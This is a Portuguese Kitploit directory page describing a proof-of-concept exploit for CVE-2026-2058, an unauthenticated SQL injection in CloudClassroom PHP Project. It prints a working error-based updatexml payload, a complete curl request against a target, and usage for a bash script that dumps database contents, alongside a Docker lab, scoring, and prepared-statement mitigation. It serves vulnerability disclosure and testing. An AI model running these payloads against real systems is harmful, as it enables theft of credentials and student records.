Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Ferramentas/GitHubGitHub/carlosalbertotuma/cve-2026-2058-poc
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebAprendizado e EducaçãoLabs e Prática
GitHubcarlosalbertotuma/cve-2026-2058-poc

CVE-2026-2058-PoC

Prova de conceito de exploit para CVE-2026-2058, uma injeção de SQL no CloudClassroom PHP Project, com enumeração automatizada de banco de dados e extração de dados.

Ver Repositório
5há 6 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2026-2058-PoC – Injeção SQL no Projeto PHP CloudClassroom

Visão Geral

Existe uma vulnerabilidade de Injeção SQL na funcionalidade Post Query do Projeto PHP CloudClassroom (v1.0).

A vulnerabilidade permite que atacantes injetem comandos SQL arbitrários por meio do parâmetro POST squeryx, levando à enumeração do banco de dados e extração de dados.

Este repositório contém um Proof of Concept (PoC) demonstrando como a vulnerabilidade pode ser explorada para extrair dados sensíveis do banco de dados backend.


Informações da Vulnerabilidade

CampoValor
CVECVE-2026-2058
Tipo de VulnerabilidadeInjeção SQL
CWECWE-89
Software AfetadoProjeto PHP CloudClassroom
Versão Afetada1.0
ComponenteFuncionalidade Post Query
Vetor de AtaqueRemoto
Autenticação NecessáriaNão
ImpactoDivulgação do banco de dados
SeveridadeAlta
Referência de Padrão de AtaqueCAPEC-66

Endpoint Vulnerável

root@kitploit:~
POST /postquerypublic

Parâmetro Vulnerável

root@kitploit:~
squeryx

Causa Raiz

O código backend concatena diretamente a entrada do usuário em uma consulta SQL sem sanitização adequada ou consultas parametrizadas.

Exemplo de código vulnerável:

root@kitploit:~
$sql = "INSERT INTO query(Query, Eid) VALUES ('$tempsquery','$tempseid')";

Como $tempsquery é derivado da entrada do usuário, atacantes podem injetar SQL arbitrário.


Ambiente de Laboratório Vulnerável (Docker)

Para fins de teste e pesquisa, um ambiente Docker vulnerável está disponível.

Execute o aplicativo vulnerável

root@kitploit:~
docker run -d --name cloudclassroom-lab -p 9292:80 bladscan/cloudclassroom-sqli:1.0

Proof of Concept

A vulnerabilidade pode ser acionada usando uma técnica de injeção SQL baseada em erro, aproveitando a função updatexml() do MySQL.

Exemplo de payload:

root@kitploit:~
a' AND updatexml(1,concat(0x7e,(SELECT database()),0x7e),1) AND '1'='1

Exploração Manual

Exemplo de requisição curl:

root@kitploit:~
curl -X POST http://TARGET/postquerypublic \
-H "Content-Type: application/x-www-form-urlencoded" \
--data-urlencode "gnamex=test" \
--data-urlencode "[email protected]" \
--data-urlencode "squeryx=a' AND updatexml(1,concat(0x7e,(SELECT database()),0x7e),1) AND '1'='1" \
--data-urlencode "update=Post Query!"

Resposta esperada:

root@kitploit:~
XPATH syntax error: '~cc_db~'

Script de Exploração

Este repositório inclui um exploit em bash que automaticamente:

  • Extrai o nome do banco de dados
  • Enumera tabelas
  • Enumera colunas
  • Despeja dados das tabelas

Uso

root@kitploit:~
chmod +x cloudclassroom_sqli_exploit.sh

./cloudclassroom_sqli_exploit.sh http://TARGET/postquerypublic

Exemplo:

root@kitploit:~
./cloudclassroom_sqli_exploit.sh http://192.168.1.10/postquerypublic

Impacto

Um atacante pode:

  • Enumerar a estrutura do banco de dados
  • Extrair dados sensíveis
  • Obter credenciais de administrador
  • Acessar registros de estudantes
  • Comprometer totalmente o banco de dados backend

Pontuação CVSS

NIST NVD

  • Pontuação Base: 9.8 (CRÍTICA)
  • Vetor: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CNA (VulDB)

  • Pontuação Base: 7.3 (ALTA)
  • Vetor: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L

⚠️ Nota: A pontuação CVSS do NVD difere da pontuação do CNA (VulDB) devido a diferentes avaliações de impacto.


EPSS (Sistema de Pontuação de Previsão de Exploração)

O Sistema de Pontuação de Previsão de Exploração (EPSS) estima a probabilidade de uma vulnerabilidade ser explorada na natureza.

CVEProbabilidade EPSSPercentilData
CVE-2026-20580.000287.62 %2026-03-01

Fonte: Conjunto de Dados FIRST EPSS


Mitigação

Os desenvolvedores devem:

  • Usar declarações preparadas
  • Implementar validação de entrada
  • Escapar adequadamente a entrada do usuário
  • Aplicar privilégios mínimos de banco de dados

Exemplo de implementação segura:

root@kitploit:~
$stmt = $conn->prepare("INSERT INTO query(Query, Eid) VALUES (?, ?)");
$stmt->bind_param("ss", $tempsquery, $tempseid);
$stmt->execute();

Capturas de Tela

Exploração de Injeção SQL

image

image

Referências

  • https://cwe.mitre.org/data/definitions/89.html
  • https://owasp.org/Top10/2025/A05_2025-Injection/
  • https://capec.mitre.org/data/definitions/66.html
  • https://github.com/OWASP/www-project-web-security-testing-guide/blob/master/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/05-Testing_for_SQL_Injection.md

Aviso Legal

Este exploit é fornecido apenas para fins educacionais e de pesquisa.

O autor não é responsável pelo uso indevido ou danos causados por este código.


Autor

bl4dsc4n

Pesquisador de Segurança

Baixar ferramenta